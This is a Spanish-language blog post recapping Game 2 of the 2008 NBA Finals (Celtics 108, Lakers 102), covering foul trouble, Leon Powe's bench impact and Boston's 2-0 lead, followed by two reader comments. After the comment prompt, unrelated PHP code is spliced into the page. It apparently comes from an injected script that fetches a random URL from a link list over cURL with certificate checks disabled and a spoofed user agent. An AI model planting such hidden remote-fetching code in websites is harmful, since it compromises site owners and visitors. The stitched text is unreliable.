Materiales inestables (LAL 102 – BOS 108)

09 de June de 2008 por TheDeerHunter

Caos.

Esta ha sido la constante en lo que llevamos de final este año. El desorden que se inició con la supuesta lesión de Pierce, la desintegración de sistemas de Lakers, los vaivenes extremos en los criterios arbitrales, los arreones emocionales irresistibles de Boston, el impacto de Powe anoche, la depresión de los reservas amarillos, los 41 puntos de Lakers en un sólo cuarto de remontada que no llegó, los 38 tiros libres de Celtics…

A río revuelto, han sido los verdes los que se han impuesto con un innegable sentido de la improvisación y de la adaptación. Un 2-0 que pone el título muy de cara. Los Celtics nunca han perdido con este resultado y los Lakers nunca han sido capaces de revertir tal situación.

El desquicio anoche fue más pronunciado, si cabe, que en el primer partido. Todo comenzó con dos faltas rigurosas y muy absurdas que sentaron a Kobe en el primer cuarto. Hasta el momento, con un Gasol muy centrado y agresivo, los amarillos habían controlado bien la situación. Con las segundas unidades en pista comenzó la pesadilla. Leon Powe, destrozó la floja defensa angelina con una facilidad pasmosa para sacar tiros libres, de hecho, él sólo lanzó en 14 minutos más tiros libres que todo el equipo rival durante todo el partido. En ese punto, la crispación y la frustración se adueñaron de Kobe y por añadidura de todo su equipo pareciendo haber más interés en pelear contra los árbitros que contra los verdaderos rivales, más esfuerzo en quejarse de cada jugada que en intentar construir baloncesto en ninguno de los dos lados. Gasol y el triangulo ofensivo ignorados…

Los Celtics campaban a sus anchas metiendo todo lo que les daba la gana, y lo que no, falta y tiros libres, una y otra vez. Pierce haciendo un descosido de campeonato a un Radmanovic completamente catatónico, Allen dando un clínic defensivo sobre la ansiedad de Kobe, Rondo disfrazado del mejor base de la liga… El único aspecto negativo fue un Garnett que estuvo bastante desacertado aunque no hizo falta que se esmerara mucho. En el 2º y 3º se inflaron rondando los 30 puntos por cuarto con unos Lakers superados por la situación y los graves problemas de faltas.

Pero no, todavía no había terminado el despiporre. En el peor momento con 24 puntos abajo en el último cuarto arreón de Lakers frente a un cortocircuito general de los locales a los que no les llegaba la camisa al cuerpo. La remontada no llegó a consumarse gracias a, cómo no, dos tiros libres de Pierce, cuando la diferencia había caído a tan sólo 2 puntos. Ni más ni menos que un parcial de 41 puntos de Lakers en el último cuarto. La locura.

Ahora la eliminatoria viaja a Los Ángeles con un claro color verde. Lo mejor que puede hacer Lakers es pensar únicamente en el próximo partido y asegurarse de ganarlo como sea. Margen de mejora para lograrlo tienen, sin duda.

Comenta

2 comentarios a esta entrada

  1. Gallis dice:
    #1

    Hay una jugada en el tercer cuarto, el mate de Powe cruzándose toda la pista, que resume perfectamente la causa principal de la derrota. Los Lakers cayeron en esa vorágine de la que hablas y se fueron totalmente del partido…

    Si pasas más tiempo pendiente de los arbitros que de Powe, los arbitros te cosen igual y Powe parece Brand…y así no se va a ningún sitio…

    Esta muy, muy complicado, pero si conseguimos que la serie vuelva a Boston, la cuesta, esperemos, no será tan alta.

      Citar

  2. TheDeerHunter dice:
    #2

    Tal y como yo he visto los partidos ahora en el Staples cambiará el panorama bastante.

    No veo porqué Lakers no pueden ganar el siguiente partido… de momento me conformo con eso.
    San Antonio también estaba así contra Hornets y los Lakers han demostrado tener más pegada todavía que ellos.

    El partido siguiente… esta noche. Veamos de que pasta están hechos los que todo el mundo da como campeones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>